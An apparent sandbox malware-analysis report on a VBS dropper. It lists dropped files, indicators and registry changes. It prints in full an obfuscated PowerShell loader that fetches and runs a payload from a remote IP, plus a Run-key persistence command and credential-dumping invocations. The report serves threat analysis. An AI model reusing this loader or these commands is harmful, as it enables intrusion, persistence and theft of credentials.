Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
AWB DOCUMENT.vbs
|
ASCII text, with very long lines (407), with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\damarsyts.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcbvgvnq.zqv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nithfyup.umy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pbyda4lz.pvo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnijk4ml.fan.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvDA82.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x6e61db79, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ootybbwcme
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Loricae.Ung
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 2 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\AWB DOCUMENT.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$arbejdslshedskasser = 1;$Untouching='Substrin';$Untouching+='g';Function
parasitical($Unleaderly){$Outswindling=$Unleaderly.Length-$arbejdslshedskasser;For($oxydation=6; $oxydation -lt $Outswindling;
$oxydation+=(7)){$Nyttedes+=$Unleaderly.$Untouching.Invoke($oxydation, $arbejdslshedskasser);}$Nyttedes;}function Pacifying($Ritraades){&
($Nationalitetsmrke) ($Ritraades);}$Gelototherapy=parasitical ' DataiMNor rioKrigsrzPragmai WronslOutstulknuckla,adici/Adress5Ps,udh.Farve
0 R mpl ,enthe(An xseWDrop,oiAndironModsagdCalor oFigurfwOmf ngs Acale BatikuNOutmouTPligtm Ecosys1Rumper0trumpe.Omstil0 Skrub;
Cigar AutostWSnogesiS mplinDrsprk6Uk,ran4 Vokse;Mediu. MongolxTehera6unba.b4Limlim;Kalkul Aaerner Knappviron k: R.rin1 toman2Overch1Pers.n.Man.cu0Faktur)Cyclos
,nintrGDiscomeRubbercOttilik Sid toBirt.b/ Lance2Por,el0Airboa1Casewo0 Trire0,algsd1Satisf0kri,st1Chresa MortifFSna.emiCericsrBrundbeMoti.ef
DaryaoJazzbaxFavela/Slknin1Finans2 Unrig1Sta,la.Tagene0Snowbe ';$Vadede=parasitical 'Tu araUp.crolsTegnebe rifinr Undis-TjenstAO,ohelgLemlsteBa.ekanF,skestTegn.n
';$Strepsipteron=parasitical 'Glob.nhAlitr tYapne,tbaronepGbakke:Predyw/bradya/E tera8Apotek7Isopha.Uncurb1 aylor2Musik,1Com.da.Sydfru1An.ihe0Rouvil5Vaaben.Slager1Cavilk8Wirers4overgo/appe.dAIdiophfPrest.mC.astaaNondesg
OphugrDiscriiStealtndogmatgCleis ePaeda,rKognin.An.aabxE pones ZoocynSprrer ';$Hoejresiden=parasitical 'Tarred>Bvelse ';$Nationalitetsmrke=parasitical
'Dans hiPolypreIndispxFjernu ';$Deciderende = parasitical 'Overwee Splanc,sittahCoweenoRegneu Manjav%AdressaE konopUnbaptpWaesomdPe,letadatab
t OutglaU,func%Ungent\ ftersLNoncenoFeatlerFysiotiK avebcSatcheaAc.idieHvel.e. D,ninUProfetnUncritg Soute Format&dresse&Gumpss
Cal.foeM,zambcUd asuhUnelevoPlutar marens$Cerebr ';Pacifying (parasitical 'Fragme$.forklg Larkil Overvo,edtprbOverfra Tomorl
Borge:PolyceIevnerin PoochdEgena uOverdisForf itHypothrS aaltiH.bituvHe,eboiAlad arUdmarkkFrem dsFaultsoUlt.almUninjuh TryllePeng,odInfanteAttraprMoler,5Blan
e6Ence.h=hidedd(samaric Stvnem Sk,nsdFabrik semico/Ri,knicNothar Mesely$UniverDDeponeeFarvelcGrenadiFaldrad Hassee SymparVir
soeSulcalnpaahrbd Vegete,ncrud)saarsk ');Pacifying (parasitical 'Palme,$DiffragBeknotlBratbeoTetraxbPiculeaMer,pelVovede:teamwoDForgroeTillg.uFr
dsstFlyseledogmefr.ntermo Ind.agFilbehaVidensmHjemm,y Inco.= Allel$FrothiS NonphtM,terirStolereEmmeripCystocs RavneiE meripudlicitFli
deeRe.lerrSpringoTendennSansea.Piaz,is EventpDemonilStenveiG,mbaltColaen(Unglob$InapprHKatalyoMeeklyeFrema,j Misa.r .vogneflirtisBihensiSoldatdCaddowe
SteppnCipaye)Tongka ');$Strepsipteron=$Deuterogamy[0];Pacifying (parasitical 'Fr,edo$Diplomg,edetelMetrikoStemmebTyksteaJaponilEncarp:
TilstBKogl.reBurp.urAr.oure SittraForbrusironieo CocoanHylden= oliatNNa,nene U lsowGuerez-.orineOSkndigbKadmiujBesl.te Stalkc
surpatspkste EmbarSPeasanyEnsretsget pmtTarante egnskmskibsl. ExactNTraitoeSlagortrueful.KildebW,latone piribPilgriCAfpa,rlFemtoniSesc
peRedskanImp ovtE.ispl ');Pacifying (parasitical ' Guml $TyfuseBTrihyde Gall.rAutarce B udeaScrymas Per,eoDiametn,olemn.Reakt.HklausueBeskataCorrupdProgree
d.gworUdledesSmre,a[,ardig$Sauc,rVKejseraOverladNuttineAffalddBickere Para.]Inhabi=Alkoho$OverliGKalk.le BarselKo.latoSpinwrt
Brakpo TeleftUnof.ehRimelieUdnvner,ndustaS.mmenpJournayRecele ');$Muffins=parasitical 'OverliBForhaneScutchrForureeSphyraa
TankssQuadreoSandr,n Enc r.Letva,DIsopleoNo ogewSumpfenSuperalTriketopolitia Strepd KraftFAseneriGurtsel BedrueRevela(Skrueb$GeneraSSin
rotSmewser P rlaeporrenpStilres Redr.iBlondepMonasttAraneoeOpopanrJugwfroarmqpfnKont r,Hmorro$ rinkUMax.minRoddikiM,rcipkIndgneuGeneromflisereUncoiftAuthen)
Equil ';$Muffins=$Industrivirksomheder56[1]+$Muffins;$Unikumet=$Industrivirksomheder56[0];Pacifying (parasitical 'Redisp$
Regimg U ennlLagerboFantasb Ud oraUniforl jlevh:AminoaU MelonnFlugtnm Uv.ldeVrdispd Erhv,a,arachl Bistal.omocyeSkamstd.oprop=T,oldk(
BlephTOrnameeHavannsSagaditAlter.- StoryPTron.ka DistitEuryokhBamoth Tid,nn$ FormaUKlynkenOpposiiTestiekSpilpluGennemmBr,ntoe
ngivetudeli,) Al.oe ');while (!$Unmedalled) {Pacifying (parasitical ' Beach$Sm.ltegarm,dalhjert,oAn,emabUgestea HadedlStran.:adve.tB
CranieMi.ants ,issitDemob,iOversec MornfkPelsdyiSvigtenSi gleg.randd=Underc$Bist,etD.bfror NonpouScrawleFredni ') ;Pacifying
$Muffins;Pacifying (parasitical ' OplanSKreatutflourea VurderSldnejtCathja-,ronflSTrav bl Int,reSkrsome Pit,lp Kollo Spyds4Trskel
');Pacifying (parasitical 'System$,rechagBitmoelTusindoPrivatbTelesaashortclHjemme:Besky,UR,ngninkal,famUnmoore KongedTasianaUnbudblAktionl
O.tomeProtesdPre,ta=Mist,k(UnparrT.uforieSkramms fo gutIn.isk-Inf.ltP.mningaMar.ystsaalfohSyges Interi$LentitUAmpullnForttniLasknikLiberauKnightmMelanoebln
eatE,igre)Ligefo ') ;Pacifying (parasitical 'Xy.ofo$s.rouggAf tvnlLatomioFor enbIndb,uaBrnefdlJeopar:UnlibetSportshBesjlieGrun
lrSaltmamTffelhoFarhanlMalediaReferebMatticiH pnotlChoroieYaho.d=Signet$Aspidig Kluddl.vangsoSpawneb eigneaBallooldenat,:
Etp.aSSpors tKalkstrIntra.iNullincformstt Levean QuaraeK bayasRyghvisKo,tan+Epider+ D,rke%Crysta$UpsentDDieba.e OccipuHyttertfljm
neOps ulrEnkelto Redigg HybosaR dsenm TolkeyFinma..literec Condio TelefuA.tionnTilfretCarann ') ;$Strepsipteron=$Deuterogamy[$thermolabile];}Pacifying
(parasitical 'Bourg,$Kaffegg ReasolBridgeoIhrdigbTj nesaStianelSafari: StartTUnwel r LuskeaseparedmeningiPenumbt Or.ngi nnesgoFritidnBrazilaTri
acr Minusi PjasklIncitoyBrandm B.icks=Hjorte MarjoGFord.me SpiratInfilt-Obs ruCLagrinocalcarn Kaur tSilvereSpk,innS.udsmtClobbe
steri$SemiviU a,ominOrthopi CritikIs quiuDiscanmbeslageAppelltSpor.s ');Pacifying (parasitical ' ydra$Tourisg IndmulShoggioCry,tab
Sna.uaHowitzl Udga,: GrusvT elefooOve astRockeryNullin woodb=tes ib P rses[AmygdoS Shoppytude os,ishyst Requee kidefmVoldes.SvendeC
Outmao.atinin,kronivUforeneTusserrNummertc,awer] oesi:chlamy:Chir,pFDazzlirExonicoNephelmDeconsB.idundaHandelsRisor eForgri6U
parc4SurbatSJulek.tMasquer DemoniIbldstnKntringBnnest(Ti,git$UdbombT UdskirI pulsaBommesdAchorgiChe,sttFormaliFresheoInsuppnU
foreaNonexcr.igniniAssignlFrondayTrimet) Taarn ');Pacifying (parasitical ' Aftrd$BegrdegBortfolRossploRotundbHimantaStegemlOps
ug:TernasTSidegar.essoueOv rlekma ikelPigeona HypernJ sephgMuseu. Groftm= Cteni an ris[MediciS DisdayHenlags BivaatNummereOpiniom
Mnste. orgnyT SilgreVanddaxIso,ogtSal.oe.Napol,E K ffenIpomo,cAff.dioMusculdGafluni DysmonStilisgRippli]Velita:forktr:BesattAImpo.tSAselliCUncateICentriILabber.TermonGKiselsePrveudtVaa
enSNo temtSko.thrblemisiDobbelnOrdrebgDough.(Unpunc$ SkelsTDr pstoN,ttletSlagteyHjemme) Blueb ');Pacifying (parasitical 'Beswar$ConkergTubifalSu.ernoEducatbMas
efa heraclTromme: Whi eR V,rdeoKonfu.oU.denif Superi indf,nBrittlgfoment=Inter,$BliverT Sque,rSkaktee ManonkRum.ellT ngema
Fr,wlnCopiopgUnmist.SuppegslymphauStokrebDepe dsRegisttMavekarTaageti Nonbin FortrgFaksim( Tilba2Subt,r8Byp an0 phl,b0stigni8Etiqu.4Forbru,Re
olv2Indust9 Ustra1Prolet7Mu.tis6Parabo)Boulev ');Pacifying $Roofing;"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Loricae.Ung && echo $"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$arbejdslshedskasser = 1;$Untouching='Substrin';$Untouching+='g';Function
parasitical($Unleaderly){$Outswindling=$Unleaderly.Length-$arbejdslshedskasser;For($oxydation=6; $oxydation -lt $Outswindling;
$oxydation+=(7)){$Nyttedes+=$Unleaderly.$Untouching.Invoke($oxydation, $arbejdslshedskasser);}$Nyttedes;}function Pacifying($Ritraades){&
($Nationalitetsmrke) ($Ritraades);}$Gelototherapy=parasitical ' DataiMNor rioKrigsrzPragmai WronslOutstulknuckla,adici/Adress5Ps,udh.Farve
0 R mpl ,enthe(An xseWDrop,oiAndironModsagdCalor oFigurfwOmf ngs Acale BatikuNOutmouTPligtm Ecosys1Rumper0trumpe.Omstil0 Skrub;
Cigar AutostWSnogesiS mplinDrsprk6Uk,ran4 Vokse;Mediu. MongolxTehera6unba.b4Limlim;Kalkul Aaerner Knappviron k: R.rin1 toman2Overch1Pers.n.Man.cu0Faktur)Cyclos
,nintrGDiscomeRubbercOttilik Sid toBirt.b/ Lance2Por,el0Airboa1Casewo0 Trire0,algsd1Satisf0kri,st1Chresa MortifFSna.emiCericsrBrundbeMoti.ef
DaryaoJazzbaxFavela/Slknin1Finans2 Unrig1Sta,la.Tagene0Snowbe ';$Vadede=parasitical 'Tu araUp.crolsTegnebe rifinr Undis-TjenstAO,ohelgLemlsteBa.ekanF,skestTegn.n
';$Strepsipteron=parasitical 'Glob.nhAlitr tYapne,tbaronepGbakke:Predyw/bradya/E tera8Apotek7Isopha.Uncurb1 aylor2Musik,1Com.da.Sydfru1An.ihe0Rouvil5Vaaben.Slager1Cavilk8Wirers4overgo/appe.dAIdiophfPrest.mC.astaaNondesg
OphugrDiscriiStealtndogmatgCleis ePaeda,rKognin.An.aabxE pones ZoocynSprrer ';$Hoejresiden=parasitical 'Tarred>Bvelse ';$Nationalitetsmrke=parasitical
'Dans hiPolypreIndispxFjernu ';$Deciderende = parasitical 'Overwee Splanc,sittahCoweenoRegneu Manjav%AdressaE konopUnbaptpWaesomdPe,letadatab
t OutglaU,func%Ungent\ ftersLNoncenoFeatlerFysiotiK avebcSatcheaAc.idieHvel.e. D,ninUProfetnUncritg Soute Format&dresse&Gumpss
Cal.foeM,zambcUd asuhUnelevoPlutar marens$Cerebr ';Pacifying (parasitical 'Fragme$.forklg Larkil Overvo,edtprbOverfra Tomorl
Borge:PolyceIevnerin PoochdEgena uOverdisForf itHypothrS aaltiH.bituvHe,eboiAlad arUdmarkkFrem dsFaultsoUlt.almUninjuh TryllePeng,odInfanteAttraprMoler,5Blan
e6Ence.h=hidedd(samaric Stvnem Sk,nsdFabrik semico/Ri,knicNothar Mesely$UniverDDeponeeFarvelcGrenadiFaldrad Hassee SymparVir
soeSulcalnpaahrbd Vegete,ncrud)saarsk ');Pacifying (parasitical 'Palme,$DiffragBeknotlBratbeoTetraxbPiculeaMer,pelVovede:teamwoDForgroeTillg.uFr
dsstFlyseledogmefr.ntermo Ind.agFilbehaVidensmHjemm,y Inco.= Allel$FrothiS NonphtM,terirStolereEmmeripCystocs RavneiE meripudlicitFli
deeRe.lerrSpringoTendennSansea.Piaz,is EventpDemonilStenveiG,mbaltColaen(Unglob$InapprHKatalyoMeeklyeFrema,j Misa.r .vogneflirtisBihensiSoldatdCaddowe
SteppnCipaye)Tongka ');$Strepsipteron=$Deuterogamy[0];Pacifying (parasitical 'Fr,edo$Diplomg,edetelMetrikoStemmebTyksteaJaponilEncarp:
TilstBKogl.reBurp.urAr.oure SittraForbrusironieo CocoanHylden= oliatNNa,nene U lsowGuerez-.orineOSkndigbKadmiujBesl.te Stalkc
surpatspkste EmbarSPeasanyEnsretsget pmtTarante egnskmskibsl. ExactNTraitoeSlagortrueful.KildebW,latone piribPilgriCAfpa,rlFemtoniSesc
peRedskanImp ovtE.ispl ');Pacifying (parasitical ' Guml $TyfuseBTrihyde Gall.rAutarce B udeaScrymas Per,eoDiametn,olemn.Reakt.HklausueBeskataCorrupdProgree
d.gworUdledesSmre,a[,ardig$Sauc,rVKejseraOverladNuttineAffalddBickere Para.]Inhabi=Alkoho$OverliGKalk.le BarselKo.latoSpinwrt
Brakpo TeleftUnof.ehRimelieUdnvner,ndustaS.mmenpJournayRecele ');$Muffins=parasitical 'OverliBForhaneScutchrForureeSphyraa
TankssQuadreoSandr,n Enc r.Letva,DIsopleoNo ogewSumpfenSuperalTriketopolitia Strepd KraftFAseneriGurtsel BedrueRevela(Skrueb$GeneraSSin
rotSmewser P rlaeporrenpStilres Redr.iBlondepMonasttAraneoeOpopanrJugwfroarmqpfnKont r,Hmorro$ rinkUMax.minRoddikiM,rcipkIndgneuGeneromflisereUncoiftAuthen)
Equil ';$Muffins=$Industrivirksomheder56[1]+$Muffins;$Unikumet=$Industrivirksomheder56[0];Pacifying (parasitical 'Redisp$
Regimg U ennlLagerboFantasb Ud oraUniforl jlevh:AminoaU MelonnFlugtnm Uv.ldeVrdispd Erhv,a,arachl Bistal.omocyeSkamstd.oprop=T,oldk(
BlephTOrnameeHavannsSagaditAlter.- StoryPTron.ka DistitEuryokhBamoth Tid,nn$ FormaUKlynkenOpposiiTestiekSpilpluGennemmBr,ntoe
ngivetudeli,) Al.oe ');while (!$Unmedalled) {Pacifying (parasitical ' Beach$Sm.ltegarm,dalhjert,oAn,emabUgestea HadedlStran.:adve.tB
CranieMi.ants ,issitDemob,iOversec MornfkPelsdyiSvigtenSi gleg.randd=Underc$Bist,etD.bfror NonpouScrawleFredni ') ;Pacifying
$Muffins;Pacifying (parasitical ' OplanSKreatutflourea VurderSldnejtCathja-,ronflSTrav bl Int,reSkrsome Pit,lp Kollo Spyds4Trskel
');Pacifying (parasitical 'System$,rechagBitmoelTusindoPrivatbTelesaashortclHjemme:Besky,UR,ngninkal,famUnmoore KongedTasianaUnbudblAktionl
O.tomeProtesdPre,ta=Mist,k(UnparrT.uforieSkramms fo gutIn.isk-Inf.ltP.mningaMar.ystsaalfohSyges Interi$LentitUAmpullnForttniLasknikLiberauKnightmMelanoebln
eatE,igre)Ligefo ') ;Pacifying (parasitical 'Xy.ofo$s.rouggAf tvnlLatomioFor enbIndb,uaBrnefdlJeopar:UnlibetSportshBesjlieGrun
lrSaltmamTffelhoFarhanlMalediaReferebMatticiH pnotlChoroieYaho.d=Signet$Aspidig Kluddl.vangsoSpawneb eigneaBallooldenat,:
Etp.aSSpors tKalkstrIntra.iNullincformstt Levean QuaraeK bayasRyghvisKo,tan+Epider+ D,rke%Crysta$UpsentDDieba.e OccipuHyttertfljm
neOps ulrEnkelto Redigg HybosaR dsenm TolkeyFinma..literec Condio TelefuA.tionnTilfretCarann ') ;$Strepsipteron=$Deuterogamy[$thermolabile];}Pacifying
(parasitical 'Bourg,$Kaffegg ReasolBridgeoIhrdigbTj nesaStianelSafari: StartTUnwel r LuskeaseparedmeningiPenumbt Or.ngi nnesgoFritidnBrazilaTri
acr Minusi PjasklIncitoyBrandm B.icks=Hjorte MarjoGFord.me SpiratInfilt-Obs ruCLagrinocalcarn Kaur tSilvereSpk,innS.udsmtClobbe
steri$SemiviU a,ominOrthopi CritikIs quiuDiscanmbeslageAppelltSpor.s ');Pacifying (parasitical ' ydra$Tourisg IndmulShoggioCry,tab
Sna.uaHowitzl Udga,: GrusvT elefooOve astRockeryNullin woodb=tes ib P rses[AmygdoS Shoppytude os,ishyst Requee kidefmVoldes.SvendeC
Outmao.atinin,kronivUforeneTusserrNummertc,awer] oesi:chlamy:Chir,pFDazzlirExonicoNephelmDeconsB.idundaHandelsRisor eForgri6U
parc4SurbatSJulek.tMasquer DemoniIbldstnKntringBnnest(Ti,git$UdbombT UdskirI pulsaBommesdAchorgiChe,sttFormaliFresheoInsuppnU
foreaNonexcr.igniniAssignlFrondayTrimet) Taarn ');Pacifying (parasitical ' Aftrd$BegrdegBortfolRossploRotundbHimantaStegemlOps
ug:TernasTSidegar.essoueOv rlekma ikelPigeona HypernJ sephgMuseu. Groftm= Cteni an ris[MediciS DisdayHenlags BivaatNummereOpiniom
Mnste. orgnyT SilgreVanddaxIso,ogtSal.oe.Napol,E K ffenIpomo,cAff.dioMusculdGafluni DysmonStilisgRippli]Velita:forktr:BesattAImpo.tSAselliCUncateICentriILabber.TermonGKiselsePrveudtVaa
enSNo temtSko.thrblemisiDobbelnOrdrebgDough.(Unpunc$ SkelsTDr pstoN,ttletSlagteyHjemme) Blueb ');Pacifying (parasitical 'Beswar$ConkergTubifalSu.ernoEducatbMas
efa heraclTromme: Whi eR V,rdeoKonfu.oU.denif Superi indf,nBrittlgfoment=Inter,$BliverT Sque,rSkaktee ManonkRum.ellT ngema
Fr,wlnCopiopgUnmist.SuppegslymphauStokrebDepe dsRegisttMavekarTaageti Nonbin FortrgFaksim( Tilba2Subt,r8Byp an0 phl,b0stigni8Etiqu.4Forbru,Re
olv2Indust9 Ustra1Prolet7Mu.tis6Parabo)Boulev ');Pacifying $Roofing;"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Loricae.Ung && echo $"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Transaquatic" /t REG_EXPAND_SZ
/d "%Diderich% -w 1 $Secretariat=(Get-ItemProperty -Path 'HKCU:\Pretemptation183\').Mincopie;%Diderich% ($Secretariat)"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ootybbwcme"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\qqzrctgeamllu"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\akmjdmrxwudqwefk"
|
|
|
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Transaquatic" /t REG_EXPAND_SZ /d "%Diderich% -w 1 $Secretariat=(Get-ItemProperty
-Path 'HKCU:\Pretemptation183\').Mincopie;%Diderich% ($Secretariat)"
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
lakour382goufs01.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://87.121.105.184/GTFcpD82.bin
|
87.121.105.184
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://87.121.105.184
|
unknown
|
||
|
http://geoplugin.net/json.gp4
|
unknown
|
||
|
http://geoplugin.net/json.gpW.G
|
unknown
|
||
|
http://geoplugin.net/json.gp1
|
unknown
|
||
|
https://aka.ms/pscore6lBkq
|
unknown
|
||
|
http://87.121.105.184/Afmagringer.xsnP
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://87.121.105.184/Afmagringer.xsnXR
|
unknown
|
||
|
http://87.121.105.184/Afmagringer.xsn
|
87.121.105.184
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://87.121.H
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 21 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
lakour382goufs01.duckdns.org
|
192.253.251.132
|
|
|
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.253.251.132
|
lakour382goufs01.duckdns.org
|
United States
|
|
|
|
87.121.105.184
|
unknown
|
Bulgaria
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\Pretemptation183
|
Mincopie
|
||
|
HKEY_CURRENT_USER\Environment
|
Diderich
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jasieotsbok-6J6ZDL
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jasieotsbok-6J6ZDL
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\jasieotsbok-6J6ZDL
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Transaquatic
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
8BB7000
|
heap
|
page read and write
|
|
|
|
5D50000
|
trusted library allocation
|
page read and write
|
|
|
|
8820000
|
direct allocation
|
page execute and read and write
|
|
|
|
B900000
|
direct allocation
|
page execute and read and write
|
|
|
|
1BEED7CF000
|
trusted library allocation
|
page read and write
|
|
|
|
2F44000
|
heap
|
page read and write
|
||
|
46D7000
|
heap
|
page read and write
|
||
|
56C37FD000
|
stack
|
page read and write
|
||
|
2CF0000
|
heap
|
page read and write
|
||
|
46D6000
|
heap
|
page read and write
|
||
|
23F7E000
|
stack
|
page read and write
|
||
|
2EF7000
|
heap
|
page read and write
|
||
|
20D085A4000
|
heap
|
page read and write
|
||
|
2456E000
|
stack
|
page read and write
|
||
|
20D06DB0000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
1BEF5AB1000
|
heap
|
page read and write
|
||
|
1BEDDE19000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
8560000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
29E0000
|
heap
|
page read and write
|
||
|
20D08B86000
|
heap
|
page read and write
|
||
|
1CE000
|
stack
|
page read and write
|
||
|
2EF9000
|
heap
|
page read and write
|
||
|
24F69000
|
unclassified section
|
page execute and read and write
|
||
|
8780000
|
trusted library allocation
|
page read and write
|
||
|
1BEDF509000
|
trusted library allocation
|
page read and write
|
||
|
8B20000
|
direct allocation
|
page read and write
|
||
|
2E83000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BBC0000
|
trusted library allocation
|
page read and write
|
||
|
20D06BB9000
|
heap
|
page read and write
|
||
|
20D06BB1000
|
heap
|
page read and write
|
||
|
2E90000
|
trusted library allocation
|
page read and write
|
||
|
27F4000
|
heap
|
page read and write
|
||
|
87CE000
|
stack
|
page read and write
|
||
|
20D08581000
|
heap
|
page read and write
|
||
|
49CE000
|
stack
|
page read and write
|
||
|
46ED000
|
heap
|
page read and write
|
||
|
8A50000
|
heap
|
page readonly
|
||
|
1E195FE000
|
stack
|
page read and write
|
||
|
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
|
24A7C000
|
heap
|
page read and write
|
||
|
767E000
|
stack
|
page read and write
|
||
|
246F0000
|
heap
|
page read and write
|
||
|
700A000
|
stack
|
page read and write
|
||
|
88D0000
|
direct allocation
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
21B81A50000
|
heap
|
page read and write
|
||
|
2462D000
|
stack
|
page read and write
|
||
|
20D06DBC000
|
heap
|
page read and write
|
||
|
20D06DB5000
|
heap
|
page read and write
|
||
|
474B000
|
heap
|
page read and write
|
||
|
3492000
|
heap
|
page read and write
|
||
|
494E000
|
stack
|
page read and write
|
||
|
45C000
|
system
|
